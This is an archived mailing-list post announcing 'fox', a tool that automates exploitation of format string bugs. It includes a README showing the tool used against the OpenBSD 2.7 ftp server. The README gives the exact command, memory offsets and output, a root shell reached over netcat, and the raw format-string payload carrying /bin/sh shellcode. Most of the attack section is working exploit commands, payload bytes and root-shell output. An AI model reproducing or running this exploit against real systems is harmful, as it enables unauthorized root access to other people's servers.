Hi "fox", a tool I wrote for automatically exploiting any (or most) format bugs, locally and remotely. Runs on OpenBSD and not ported to other platforms, though it should be very straighforward. The only requirement is that you get the actual printed string back to the program, in the case of the OpenBSD 2.7 ftpd you need to proxy this through a small shell program since the output occurs in the process listing. Should work for exploiting bugs on most little-endian 32bit-machines like the i386 providing you supply the shellcode. Includes a trivial local example, and an example of how to point it at the OpenBSD 2.7 ftpd and remotely get a root prompt instead of the ftp banner. Regards, Fredrik Widlund -x- README for example 2: Exploiting OpenBSD 2.7 ftp server Input has to be < 256 characters, working offsets are -18 and -2 Ex: root@wolf> ./fox -s 220 -p 50 -o-18 ex2/ex2 alignment 0 chars before argument 111 chars before insert 0 argument offset 9 argument pointer offset 0 argument address 0xdfbfd15c esp 0xdfbfd138 uid=0(root) gid=0(wheel) groups=0(wheel) root@wolf> nc 127.0.0.1 21 id uid=0(root) gid=0(wheel) groups=0(wheel) uname -a OpenBSD wolf 2.7 GENERIC#0 i386 cat /etc/hosts 127.0.0.1 AAAA<81>ð<81>Ð<81>¿<81>ßBBBB<81>ñ<81>Ð<81>¿<81>ßCCCC<81>ò<81>Ð<81>¿ <81>ßDDDD<81>ó<81>Ð<81>¿<81>ß%p%p%p%p%p%p%p%p%p%0323x%hn%0287x%hn%0238x%hn%0288x%hn<81>ëI<8B>$<81>Ã1<81>ÉQ<83><81>ÀP<89><81>Ã<83><81>ÃS<89>?<88>K<83><89>X<88>K <83><81>Ã<89><88>K<83><89>HP<81>¸;UUU%;<81>ª<81>ª<81>ª<81>Í<80>PP<81>¸UUU%<81>ª <81>ª<81>ª<81>Í<80><81>è<81>²<81>ÿ<81>ÿ<81>ÿ<81>ë<81>´[CODE_BY_LONEWOLF]/bin/shF-cGG/bin/shAxxxxxxxxxxxxx exit root@wolf>
This archive was generated by hypermail 2b30 : Fri Apr 19 2002 - 11:49:48 PDT